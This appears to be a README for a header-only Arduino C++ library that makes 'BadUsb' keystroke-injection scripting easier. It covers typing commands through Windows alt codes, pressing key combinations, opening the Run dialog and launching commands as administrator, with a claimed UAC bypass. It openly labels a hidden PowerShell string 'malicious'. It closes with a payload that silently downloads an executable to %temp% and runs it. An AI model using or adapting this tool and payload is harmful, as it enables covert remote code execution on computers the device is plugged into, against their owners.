simple header only lib written in C++ to make BadUsb scripting easier (Arduino IDE)
image from
#include "alt.hpp"
When you connect the device for the first time, it takes time for the system to detect it
in brackets we write the delay time from connecting the device to the start of its operation
// commands
static const alt_code alt_codes_array[] = {
{' ', 32}, {'B', 66}, {'C', 67}, {'D', 68}, {'E', 69}, {'F', 70},
{'G', 71}, {'H', 72}, {'I', 73}, {'J', 74}, {'K', 75}, {'L', 76},
{'M', 77}, {'N', 78}, {'O', 79}, {'P', 80}, {'Q', 81}, {'R', 82},
{'S', 83}, {'T', 84}, {'U', 85}, {'V', 86}, {'W', 87}, {'X', 88},
{'Y', 89}, {'Z', 90}, {'a', 97}, {'b', 98}, {'c', 99}, {'d', 100},
{'e', 101}, {'f', 102}, {'g', 103}, {'h', 104}, {'i', 105}, {'j', 106},
{'k', 107}, {'l', 108}, {'m', 109}, {'n', 110}, {'o', 111}, {'p', 112},
{'q', 113}, {'r', 114}, {'s', 115}, {'t', 116}, {'u', 117}, {'v', 118},
{'w', 119}, {'x', 120}, {'y', 121}, {'z', 122}, {'0', 48}, {'1', 49},
{'2', 50}, {'3', 51}, {'4', 52}, {'5', 53}, {'6', 54}, {'7', 55},
{'8', 56}, {'9', 57}, {'!', 33}, {'"', 34}, {'#', 35}, {'$', 36},
{'%', 37}, {'&', 38}, {'\'', 39}, {'(', 40}, {')', 41}, {'*', 42},
{'+', 43}, {',', 44}, {'-', 45}, {'.', 46}, {'/', 47}, {':', 58},
{';', 59}, {'<', 60}, {'=', 61}, {'>', 62}, {'?', 63}, {'@', 64},
{'[', 91}, {'\\', 92}, {']', 93}, {'^', 94}, {'_', 95}, {'`', 96},
{'{', 123}, {'|', 124}, {'}', 125}, {'~', 126}, {'A', 65}};
const char *payload_str = "powershell -windowstyle hidden..."; // malicious string
// void alt_print(const char *str, size_t t_sleep)
alt_print(payload_str, 0); // (malicious_string, sleep time for enter next char)
/* sleep time for enter next char.. because i had problems on Windows 7
that the system was unable to process alt codes, on Win 10/11 work well */
#define MKEY_LEFT_CTRL (0x0001 << 0x00)
#define MKEY_LEFT_WIN (0x0001 << 0x01)
#define MKEY_LEFT_SHIFT (0x0001 << 0x02)
#define MKEY_LEFT_ALT (0x0001 << 0x03)
#define MKEY_ENTER (0x0001 << 0x04)
#define MKEY_LEFT_ARROW (0x0001 << 0x05)
#define MKEY_RIGHT_ARROW (0x0001 << 0x06)
#define MKEY_CH_R (0x0001 << 0x07)
#define MKEY_CH_A (0x0001 << 0x08)
#define MKEY_CH_C (0x0001 << 0x09)
#define MKEY_FN_4 (0x0001 << 0x0A)
#define MKEY_CH_Y (0x0001 << 0x0B)
The PRESS functions is used to press special keys and simultaneously press several keys on the keyboard
// #define PRESS(BTNS, t_sleep)
PRESS(MKEY_LEFT_CTRL | MKEY_LEFT_SHIFT | MKEY_ENTER, 200) // (buttons to be pressed, sleep time for press next button)
// #define PRESS_KRELALL(BTNS, t_sleep, t_wait)
PRESS_KRELALL(MKEY_LEFT_WIN | MKEY_CH_R, 200, 500) // (buttons to be pressed, sleep time for press next button, sleep time to release the buttons)
// bool release_btn(const uint8_t button)
release_btn(MKEY_ENTER) // (buttons to be released)
// void tprint(const char *str, size_t t_sleep)
tprint("echo Hello World!", 30) // (string, sleep time for enter next char), default print (NOT ALT)
// #define WAIT(ms)
WAIT(500) // delay 500 ms
// #define RUN_ENTER(command, t_sleep_print)
RUN_ENTER("msiexec /i", 0) // (command for win + r (run), sleep time to release the buttons(alt codes))
// #define RUN_ENTER_AS_ADMIN(command, t_sleep_print)
RUN_ENTER_AS_ADMIN("msiexec /i", 0) // (command for win + r (run), sleep time to release the buttons(alt codes))
// will be run as administrator (UAC bypass if user admin on system)
#include "alt.hpp"
// When you connect the device for the first time, it takes time for the system to detect it
const char *str = "powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('"
"', '%temp%/py_install.exe'); %temp%/py_install.exe";